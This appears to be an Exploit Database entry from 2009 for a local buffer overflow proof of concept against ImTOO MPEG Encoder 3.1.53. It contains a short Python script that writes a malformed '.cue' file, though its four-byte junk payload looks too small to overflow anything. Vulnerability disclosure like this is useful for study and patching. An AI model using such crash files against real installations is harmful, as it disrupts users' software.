Lucene search

K
exploitdbOpt!x hackerEDB-ID:9382
HistoryAug 06, 2009 - 12:00 a.m.

ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)

2009-08-0600:00:00
opt!x hacker
www.exploit-db.com
26

AI Score

7.4

Confidence

Low

#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker <[email protected]> "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9382